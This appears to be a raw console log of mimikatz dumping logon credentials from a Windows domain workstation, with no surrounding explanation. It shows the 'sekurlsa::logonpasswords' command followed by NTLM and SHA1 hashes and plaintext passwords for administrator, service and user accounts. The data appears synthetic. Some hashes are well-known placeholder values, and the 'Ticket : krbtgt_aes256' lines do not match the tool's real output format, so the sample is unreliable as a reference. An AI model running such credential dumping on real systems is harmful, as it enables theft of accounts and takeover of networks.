mimikatz(commandline) # sekurlsa::logonpasswords
mimikatz 2.2.0 (x64) built on Nov 10 2021 02:36:12
"A La Vie, A L'Amour" - (oe.eo)

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WORKSTATION01$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 1/15/2024 8:42:13 AM
SID               : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : WORKSTATION01$
	 * Domain   : CORP
	 * NTLM     : a4f49c406510bdcab6824ee7c30fd852
	 * SHA1     : 7c2c3f4a5b6e7d8c9a0b1c2d3e4f5a6b7c8d9e0f
	tspkg :
	wdigest :
	 * Username : WORKSTATION01$
	 * Domain   : CORP
	 * Password : (null)
	kerberos :
	 * Username : workstation01$
	 * Domain   : CORP.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : Interactive from 1
User Name         : administrator
Domain            : CORP
Logon Server      : DC01
Logon Time        : 1/15/2024 9:15:22 AM
SID               : S-1-5-21-3623811015-3361044348-30300820-500
	msv :
	 [00000003] Primary
	 * Username : administrator
	 * Domain   : CORP
	 * NTLM     : 8846f7eaee8fb117ad06bdd830b7586c
	 * SHA1     : a3d5c7e9f1b3d5a7c9e1f3b5d7a9c1e3f5b7d9a1
	tspkg :
	 * Username : administrator
	 * Domain   : CORP
	 * Password : P@ssw0rd2024!
	wdigest :
	 * Username : administrator
	 * Domain   : CORP
	 * Password : P@ssw0rd2024!
	kerberos :
	 * Username : administrator
	 * Domain   : CORP.LOCAL
	 * Password : P@ssw0rd2024!
	ssp :
	credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/15/2024 8:42:15 AM
SID               : S-1-5-19
	msv :
	tspkg :
	wdigest :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 64328 (00000000:0000fb48)
Session           : Interactive from 2
User Name         : jsmith
Domain            : CORP
Logon Server      : DC01
Logon Time        : 1/15/2024 9:23:47 AM
SID               : S-1-5-21-3623811015-3361044348-30300820-1103
	msv :
	 [00000003] Primary
	 * Username : jsmith
	 * Domain   : CORP
	 * NTLM     : 5f4dcc3b5aa765d61d8327deb882cf99
	 * SHA1     : 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
	tspkg :
	wdigest :
	 * Username : jsmith
	 * Domain   : CORP
	 * Password : (null)
	kerberos :
	 * Username : jsmith
	 * Domain   : CORP.LOCAL
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 78945 (00000000:000134a1)
Session           : Interactive from 1
User Name         : dbadmin
Domain            : WORKSTATION01
Logon Server      : WORKSTATION01
Logon Time        : 1/15/2024 10:05:33 AM
SID               : S-1-5-21-2847529019-2394857124-1983745298-1001
	msv :
	 [00000003] Primary
	 * Username : dbadmin
	 * Domain   : WORKSTATION01
	 * NTLM     : e19ccf75ee54e06b06a5907af13cef42
	 * SHA1     : b89eaac7e61417341b710b727768294d0e6a277b
	tspkg :
	 * Username : dbadmin
	 * Domain   : WORKSTATION01
	 * Password : Database2024Admin
	wdigest :
	 * Username : dbadmin
	 * Domain   : WORKSTATION01
	 * Password : Database2024Admin
	kerberos :
	 * Username : dbadmin
	 * Domain   : WORKSTATION01
	 * Password : (null)
	ssp :
	credman :

Authentication Id : 0 ; 91274 (00000000:0001648a)
Session           : RemoteInteractive from 2
User Name         : svc_backup
Domain            : CORP
Logon Server      : DC01
Logon Time        : 1/15/2024 10:42:18 AM
SID               : S-1-5-21-3623811015-3361044348-30300820-1157
	msv :
	 [00000003] Primary
	 * Username : svc_backup
	 * Domain   : CORP
	 * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
	 * SHA1     : 4e99e8c12de7e01a9d1e0f2b3c8d7f1a0c9b8e7d
	tspkg :
	wdigest :
	 * Username : svc_backup
	 * Domain   : CORP
	 * Password : (null)
	kerberos :
	 * Username : svc_backup
	 * Domain   : CORP.LOCAL
	 * Password : (null)
	 * Ticket   : krbtgt_aes256_f3a4b2c1d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d9e0f1a2
	ssp :
	credman :

Authentication Id : 0 ; 105842 (00000000:00019d72)
Session           : Interactive from 1
User Name         : mwilson
Domain            : CORP
Logon Server      : DC01
Logon Time        : 1/15/2024 11:18:05 AM
SID               : S-1-5-21-3623811015-3361044348-30300820-1189
	msv :
	 [00000003] Primary
	 * Username : mwilson
	 * Domain   : CORP
	 * NTLM     : aad3b435b51404eeaad3b435b51404ee
	 * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
	tspkg :
	 * Username : mwilson
	 * Domain   : CORP
	 * Password : Summer2024!Change
	wdigest :
	 * Username : mwilson
	 * Domain   : CORP
	 * Password : Summer2024!Change
	kerberos :
	 * Username : mwilson
	 * Domain   : CORP.LOCAL
	 * Password : Summer2024!Change
	 * Ticket   : krbtgt_aes256_a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2
	ssp :
	credman :

mimikatz # exit
Bye!